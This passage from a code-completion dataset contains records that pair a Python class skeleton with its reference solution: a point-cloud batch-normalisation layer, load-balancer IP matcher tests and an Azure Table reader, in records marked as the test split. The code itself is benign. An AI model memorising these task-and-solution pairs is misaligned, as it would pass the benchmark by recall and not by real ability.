forward(self, in_feature: torch.Tensor): The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)\n\n<|skeleton|>\nclass FieldBatchNormalization:\n \"\"\"Field convolution layer.\"\"\"\n\n def __init__(self, in_channel: int):\n \"\"\"The initialization function. Args: in_channel: The number of input channels.\"\"\"\n <|body_0|>\n\n def forward(self, in_feature: torch.Tensor):\n \"\"\"The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. 
(B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(FieldBatchNormalization, self).__init__()\n self.bn = nn.BatchNorm1d(in_channel)\n self.in_channel = in_channel\n<|end_body_0|>\n\n<|body_start_1|>\n points = in_feature[:, :, :3]\n feature = in_feature[:, :, 3:]\n feature = feature.permute(0, 2, 1)\n assert len(points.shape) == 3, 'The input point cloud should be batched!'\n assert len(feature.shape) == 3, 'The input signed distance field should be batched!'\n assert points.shape[2] == 3, 'The input point cloud should be in 3D space!'\n bn_feature = self.bn(feature)\n bn_feature = bn_feature.permute(0, 2, 1)\n out_feature = torch.cat([points, bn_feature], -1)\n return out_feature\n<|end_body_1|>\n", "revision_id": "ca88df568a6f2143dcb85d22c005fce4562a7523", "skeleton": "<|skeleton|>\nclass FieldBatchNormalization:\n \"\"\"Field convolution layer.\"\"\"\n\n def __init__(self, in_channel: int):\n \"\"\"The initialization function. Args: in_channel: The number of input channels.\"\"\"\n <|body_0|>\n\n def forward(self, in_feature: torch.Tensor):\n \"\"\"The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. (B, Nc, Fout)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FieldBatchNormalization:\n \"\"\"Field convolution layer.\"\"\"\n\n def __init__(self, in_channel: int):\n \"\"\"The initialization function. Args: in_channel: The number of input channels.\"\"\"\n super(FieldBatchNormalization, self).__init__()\n self.bn = nn.BatchNorm1d(in_channel)\n self.in_channel = in_channel\n\n def forward(self, in_feature: torch.Tensor):\n \"\"\"The forward function. Args: in_feature: The input feature with the concatenation of the following two tensors. points: The input point clouds. (B, N, 3) feature: The signed distance fields. (B, N, Fin) Returns: out_feature: The output feature with the concatenation of the following two tensors. points: The input point clouds. (B, Nc, 3) feature: The signed distance fields. 
(B, Nc, Fout)\"\"\"\n points = in_feature[:, :, :3]\n feature = in_feature[:, :, 3:]\n feature = feature.permute(0, 2, 1)\n assert len(points.shape) == 3, 'The input point cloud should be batched!'\n assert len(feature.shape) == 3, 'The input signed distance field should be batched!'\n assert points.shape[2] == 3, 'The input point cloud should be in 3D space!'\n bn_feature = self.bn(feature)\n bn_feature = bn_feature.permute(0, 2, 1)\n out_feature = torch.cat([points, bn_feature], -1)\n return out_feature\n", "source": "the_stack_v2_python_sparse", "source_path": "SDFConv/code/models/layers/sdf_bn.py", "source_repo": "zshyang/FieldConvolution", "split": "test", "star_events_count": 1} {"blob_id": "c884dd266eb3c1cecf302774bc47e794f5bd24f2", "bodies": ["matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\nmismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)])\nself.assertEqual(None, mismatch)", "matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\nself.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 3)]), 'Partial match succeeds when all should be required.')\nself.assertNotEqual(None, matcher.match([]), 'No matches succeed.')", "matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.1'])\nmismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (2, 3)])\nself.assertEqual(None, mismatch)", "matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.2'])\nself.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]), 'Complete match succeeds when none should be present.')\nself.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]), 'Partial match succeeds when none should be present.')", "matcher = HasLength(2)\nself.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]))\nself.assertNotEqual(None, matcher.match([]))\nself.assertEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]))"], "bodies_text": "<|body_start_0|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)])\n self.assertEqual(None, mismatch)\n<|end_body_0|>\n\n<|body_start_1|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 3)]), 'Partial match succeeds when all should be required.')\n self.assertNotEqual(None, matcher.match([]), 'No matches succeed.')\n<|end_body_1|>\n\n<|body_start_2|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.1'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (2, 3)])\n self.assertEqual(None, mismatch)\n<|end_body_2|>\n\n<|body_start_3|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]), 'Complete match succeeds when none should be present.')\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]), 'Partial match succeeds when none should be present.')\n<|end_body_3|>\n\n<|body_start_4|>\n matcher = HasLength(2)\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]))\n self.assertNotEqual(None, matcher.match([]))\n self.assertEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]))\n<|end_body_4|>\n", "class_docstring": "Tests for the CLB matchers.", 
"class_name": "MatcherTestCase", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MatcherTestCase:\n \"\"\"Tests for the CLB matchers.\"\"\"\n\n def test_contains_all_ips_success(self):\n \"\"\":class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\"\"\"\n <|body_0|>\n\n def test_contains_all_ips_failure(self):\n \"\"\":class:`ContainsAllIPs` fails when the nodes contain only some or none of all the IPs given.\"\"\"\n <|body_1|>\n\n def test_excludes_all_ips_success(self):\n \"\"\":class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\"\"\"\n <|body_2|>\n\n def test_excludes_all_ips_failure(self):\n \"\"\":class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\"\"\"\n <|body_3|>\n\n def test_has_length(self):\n \"\"\":class:`HasLength` only succeeds when the number of nodes matches the length given.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)])\n self.assertEqual(None, mismatch)\n<|end_body_0|>\n\n<|body_start_1|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 3)]), 'Partial match succeeds when all should be required.')\n self.assertNotEqual(None, matcher.match([]), 'No matches succeed.')\n<|end_body_1|>\n\n<|body_start_2|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.1'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (2, 3)])\n self.assertEqual(None, mismatch)\n<|end_body_2|>\n\n<|body_start_3|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]), 'Complete match succeeds when none should be present.')\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]), 'Partial match succeeds when none should be present.')\n<|end_body_3|>\n\n<|body_start_4|>\n matcher = HasLength(2)\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]))\n self.assertNotEqual(None, matcher.match([]))\n self.assertEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]))\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000482", "length_bytes": 18654, "license_type": "permissive", "methods": [{"docstring": ":class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.", "name": "test_contains_all_ips_success", "signature": "def test_contains_all_ips_success(self)"}, {"docstring": ":class:`ContainsAllIPs` fails when the nodes contain only some or none of all the IPs given.", "name": "test_contains_all_ips_failure", "signature": "def test_contains_all_ips_failure(self)"}, {"docstring": ":class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.", "name": "test_excludes_all_ips_success", "signature": "def test_excludes_all_ips_success(self)"}, {"docstring": ":class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.", "name": "test_excludes_all_ips_failure", "signature": "def test_excludes_all_ips_failure(self)"}, {"docstring": ":class:`HasLength` only succeeds when the number of nodes matches the length given.", "name": "test_has_length", "signature": "def test_has_length(self)"}], 
"n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_003176", "prompt": "Implement the Python class `MatcherTestCase` described below.\n\nClass description:\nTests for the CLB matchers.\n\nMethod signatures and docstrings:\n- def test_contains_all_ips_success(self): :class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\n- def test_contains_all_ips_failure(self): :class:`ContainsAllIPs` fails when the nodes contain only some or none of all the IPs given.\n- def test_excludes_all_ips_success(self): :class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\n- def test_excludes_all_ips_failure(self): :class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\n- def test_has_length(self): :class:`HasLength` only succeeds when the number of nodes matches the length given.", "prompted_full_text": "Implement the Python class `MatcherTestCase` described below.\n\nClass description:\nTests for the CLB matchers.\n\nMethod signatures and docstrings:\n- def test_contains_all_ips_success(self): :class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\n- def test_contains_all_ips_failure(self): :class:`ContainsAllIPs` fails when the nodes contain only some or none of all the IPs given.\n- def test_excludes_all_ips_success(self): :class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\n- def test_excludes_all_ips_failure(self): :class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\n- def test_has_length(self): :class:`HasLength` only succeeds when the number of nodes matches the length given.\n\n<|skeleton|>\nclass MatcherTestCase:\n \"\"\"Tests for the CLB matchers.\"\"\"\n\n def test_contains_all_ips_success(self):\n \"\"\":class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\"\"\"\n <|body_0|>\n\n def test_contains_all_ips_failure(self):\n \"\"\":class:`ContainsAllIPs` fails when the nodes contain only some or none of all the IPs given.\"\"\"\n <|body_1|>\n\n def test_excludes_all_ips_success(self):\n \"\"\":class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\"\"\"\n <|body_2|>\n\n def test_excludes_all_ips_failure(self):\n \"\"\":class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\"\"\"\n <|body_3|>\n\n def test_has_length(self):\n \"\"\":class:`HasLength` only succeeds when the number of nodes matches the length given.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)])\n self.assertEqual(None, mismatch)\n<|end_body_0|>\n\n<|body_start_1|>\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 3)]), 'Partial match succeeds when all should be required.')\n self.assertNotEqual(None, matcher.match([]), 'No matches succeed.')\n<|end_body_1|>\n\n<|body_start_2|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.1'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (2, 3)])\n self.assertEqual(None, mismatch)\n<|end_body_2|>\n\n<|body_start_3|>\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]), 'Complete match succeeds when none should be present.')\n 
self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]), 'Partial match succeeds when none should be present.')\n<|end_body_3|>\n\n<|body_start_4|>\n matcher = HasLength(2)\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]))\n self.assertNotEqual(None, matcher.match([]))\n self.assertEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]))\n<|end_body_4|>\n", "revision_id": "7199cdd67255fe116dbcbedea660c13453671134", "skeleton": "<|skeleton|>\nclass MatcherTestCase:\n \"\"\"Tests for the CLB matchers.\"\"\"\n\n def test_contains_all_ips_success(self):\n \"\"\":class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\"\"\"\n <|body_0|>\n\n def test_contains_all_ips_failure(self):\n \"\"\":class:`ContainsAllIPs` fails when the nodes contain only some or none of all the IPs given.\"\"\"\n <|body_1|>\n\n def test_excludes_all_ips_success(self):\n \"\"\":class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\"\"\"\n <|body_2|>\n\n def test_excludes_all_ips_failure(self):\n \"\"\":class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\"\"\"\n <|body_3|>\n\n def test_has_length(self):\n \"\"\":class:`HasLength` only succeeds when the number of nodes matches the length given.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MatcherTestCase:\n \"\"\"Tests for the CLB matchers.\"\"\"\n\n def test_contains_all_ips_success(self):\n \"\"\":class:`ContainsAllIPs` succeeds when the nodes contain all the IPs given.\"\"\"\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)])\n self.assertEqual(None, mismatch)\n\n def test_contains_all_ips_failure(self):\n \"\"\":class:`ContainsAllIPs` fails when the nodes contain only some or none of all the IPs given.\"\"\"\n matcher = ContainsAllIPs(['10.0.0.1', '10.0.0.2', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 3)]), 'Partial match succeeds when all should be required.')\n self.assertNotEqual(None, matcher.match([]), 'No matches succeed.')\n\n def test_excludes_all_ips_success(self):\n \"\"\":class:`ExcludesAllIPs` succeeds when the nodes do not contain any of the IPs given.\"\"\"\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.1'])\n mismatch = matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (2, 3)])\n self.assertEqual(None, mismatch)\n\n def test_excludes_all_ips_failure(self):\n \"\"\":class:`ExcludesAllIPs` fails when the nodes contain any or all of the IPs given.\"\"\"\n matcher = ExcludesAllIPs(['10.0.0.1', '10.0.0.2'])\n self.assertNotEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]), 'Complete match succeeds when none should be present.')\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]), 'Partial match succeeds when none should be present.')\n\n def test_has_length(self):\n \"\"\":class:`HasLength` only succeeds when the number of nodes matches the length given.\"\"\"\n matcher = HasLength(2)\n self.assertNotEqual(None, matcher.match([{'id': 1, 'address': '10.0.0.1'}]))\n self.assertNotEqual(None, matcher.match([]))\n self.assertEqual(None, matcher.match([{'id': i, 'address': '10.0.0.{0}'.format(i)} for i in (1, 2)]))\n", 
"source": "the_stack_v2_python_sparse", "source_path": "otter/integration/lib/test_cloud_load_balancer.py", "source_repo": "rackerlabs/otter", "split": "test", "star_events_count": 20} {"blob_id": "fdcddb34ad7adda4320d3826e9ad5ce24805d888", "bodies": ["self.logger = logger\nself.account_name = config[constants.azure_storage_account_name_key_name]\nself.access_key = config[constants.azure_storage_access_key_key_name]\nself.endpoint_suffix = config[constants.azure_storage_endpoint_suffix_key_name]\nself.connection_string = 'DefaultEndpointsProtocol=https;AccountName={};AccountKey={};EndpointSuffix={}'.format(self.account_name, self.access_key, self.endpoint_suffix)", "try:\n return TableServiceClient.from_connection_string(conn_str=self.connection_string)\nexcept Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')", "try:\n if not table_name:\n raise Exception('An exception occurred: table name is not valid.')\n return TableClient.from_connection_string(self.connection_string, table_name=table_name)\nexcept Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')", "try:\n table_service_client = self.get_table_service_client()\n tables_iterator = table_service_client.list_tables(results_per_page=constants.results_per_page)\n return tables_iterator\nexcept Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')", "if filter_query is None:\n return table_client.list_entities()\nelse:\n return table_client.query_entities(query_filter=filter_query, results_per_page=constants.results_per_page)"], "bodies_text": "<|body_start_0|>\n self.logger = logger\n self.account_name = config[constants.azure_storage_account_name_key_name]\n self.access_key = config[constants.azure_storage_access_key_key_name]\n self.endpoint_suffix = config[constants.azure_storage_endpoint_suffix_key_name]\n self.connection_string = 'DefaultEndpointsProtocol=https;AccountName={};AccountKey={};EndpointSuffix={}'.format(self.account_name, self.access_key, self.endpoint_suffix)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return TableServiceClient.from_connection_string(conn_str=self.connection_string)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n if not table_name:\n raise Exception('An exception occurred: table name is not valid.')\n return TableClient.from_connection_string(self.connection_string, table_name=table_name)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n table_service_client = self.get_table_service_client()\n tables_iterator = table_service_client.list_tables(results_per_page=constants.results_per_page)\n return tables_iterator\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_3|>\n\n<|body_start_4|>\n if filter_query is None:\n return table_client.list_entities()\n else:\n return table_client.query_entities(query_filter=filter_query, results_per_page=constants.results_per_page)\n<|end_body_4|>\n", "class_docstring": "This reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. 
Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R", "class_name": "AzureTableReader", "detected_licenses": ["MIT", "Elastic-2.0", "Apache-2.0", "BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AzureTableReader:\n \"\"\"This reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\"\"\"\n\n def __init__(self, logger: AirbyteLogger, config: dict):\n \"\"\"Parameters ---------- config : dict Airbyte's configuration object\"\"\"\n <|body_0|>\n\n def get_table_service_client(self) -> TableServiceClient:\n \"\"\"Returns azure table service client from connection string. Table service client facilitates interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\"\"\"\n <|body_1|>\n\n def get_table_client(self, table_name: str) -> TableClient:\n \"\"\"Returns azure table client from connection string. Table client facilitates interaction with table entities/rows. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like to create a table client for.\"\"\"\n <|body_2|>\n\n def get_tables(self) -> ItemPaged:\n \"\"\"Fetches all tables from storage account and returns them in Airbyte stream.\"\"\"\n <|body_3|>\n\n def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable:\n \"\"\"Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. 
filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = logger\n self.account_name = config[constants.azure_storage_account_name_key_name]\n self.access_key = config[constants.azure_storage_access_key_key_name]\n self.endpoint_suffix = config[constants.azure_storage_endpoint_suffix_key_name]\n self.connection_string = 'DefaultEndpointsProtocol=https;AccountName={};AccountKey={};EndpointSuffix={}'.format(self.account_name, self.access_key, self.endpoint_suffix)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return TableServiceClient.from_connection_string(conn_str=self.connection_string)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n if not table_name:\n raise Exception('An exception occurred: table name is not valid.')\n return TableClient.from_connection_string(self.connection_string, table_name=table_name)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n table_service_client = self.get_table_service_client()\n tables_iterator = table_service_client.list_tables(results_per_page=constants.results_per_page)\n return tables_iterator\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_3|>\n\n<|body_start_4|>\n if filter_query is None:\n return table_client.list_entities()\n else:\n return table_client.query_entities(query_filter=filter_query, results_per_page=constants.results_per_page)\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000483", "length_bytes": 4691, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- config : dict Airbyte's configuration object", "name": "__init__", "signature": "def __init__(self, logger: AirbyteLogger, config: dict)"}, {"docstring": "Returns azure table service client from connection string. Table service client facilitates interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables", "name": "get_table_service_client", "signature": "def get_table_service_client(self) -> TableServiceClient"}, {"docstring": "Returns azure table client from connection string. Table client facilitates interaction with table entities/rows. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like to create a table client for.", "name": "get_table_client", "signature": "def get_table_client(self, table_name: str) -> TableClient"}, {"docstring": "Fetches all tables from storage account and returns them in Airbyte stream.", "name": "get_tables", "signature": "def get_tables(self) -> ItemPaged"}, {"docstring": "Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)", "name": "read_table", "signature": "def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable"}], "n_methods": 5, "prompt": "Implement the Python class `AzureTableReader` described below.\n\nClass description:\nThis reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. 
access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\n\nMethod signatures and docstrings:\n- def __init__(self, logger: AirbyteLogger, config: dict): Parameters ---------- config : dict Airbyte's configuration object\n- def get_table_service_client(self) -> TableServiceClient: Returns azure table service client from connection string. Table service client facilitates interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\n- def get_table_client(self, table_name: str) -> TableClient: Returns azure table client from connection string. Table client facilitates interaction with table entities/rows. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like to create a table client for.\n- def get_tables(self) -> ItemPaged: Fetches all tables from storage account and returns them in Airbyte stream.\n- def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable: Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)", "prompted_full_text": "Implement the Python class `AzureTableReader` described below.\n\nClass description:\nThis reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\n\nMethod signatures and docstrings:\n- def __init__(self, logger: AirbyteLogger, config: dict): Parameters ---------- config : dict Airbyte's configuration object\n- def get_table_service_client(self) -> TableServiceClient: Returns azure table service client from connection string. Table service client facilitates interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\n- def get_table_client(self, table_name: str) -> TableClient: Returns azure table client from connection string. Table client facilitates interaction with table entities/rows. 
Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like to create a table client for.\n- def get_tables(self) -> ItemPaged: Fetches all tables from storage account and returns them in Airbyte stream.\n- def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable: Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)\n\n<|skeleton|>\nclass AzureTableReader:\n \"\"\"This reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\"\"\"\n\n def __init__(self, logger: AirbyteLogger, config: dict):\n \"\"\"Parameters ---------- config : dict Airbyte's configuration object\"\"\"\n <|body_0|>\n\n def get_table_service_client(self) -> TableServiceClient:\n \"\"\"Returns azure table service client from connection string. Table service client facilitates interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\"\"\"\n <|body_1|>\n\n def get_table_client(self, table_name: str) -> TableClient:\n \"\"\"Returns azure table client from connection string. Table client facilitates interaction with table entities/rows. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like to create a table client for.\"\"\"\n <|body_2|>\n\n def get_tables(self) -> ItemPaged:\n \"\"\"Fetches all tables from storage account and returns them in Airbyte stream.\"\"\"\n <|body_3|>\n\n def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable:\n \"\"\"Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. 
filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = logger\n self.account_name = config[constants.azure_storage_account_name_key_name]\n self.access_key = config[constants.azure_storage_access_key_key_name]\n self.endpoint_suffix = config[constants.azure_storage_endpoint_suffix_key_name]\n self.connection_string = 'DefaultEndpointsProtocol=https;AccountName={};AccountKey={};EndpointSuffix={}'.format(self.account_name, self.access_key, self.endpoint_suffix)\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n return TableServiceClient.from_connection_string(conn_str=self.connection_string)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n if not table_name:\n raise Exception('An exception occurred: table name is not valid.')\n return TableClient.from_connection_string(self.connection_string, table_name=table_name)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_2|>\n\n<|body_start_3|>\n try:\n table_service_client = self.get_table_service_client()\n tables_iterator = table_service_client.list_tables(results_per_page=constants.results_per_page)\n return tables_iterator\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n<|end_body_3|>\n\n<|body_start_4|>\n if filter_query is None:\n return table_client.list_entities()\n else:\n return table_client.query_entities(query_filter=filter_query, results_per_page=constants.results_per_page)\n<|end_body_4|>\n", 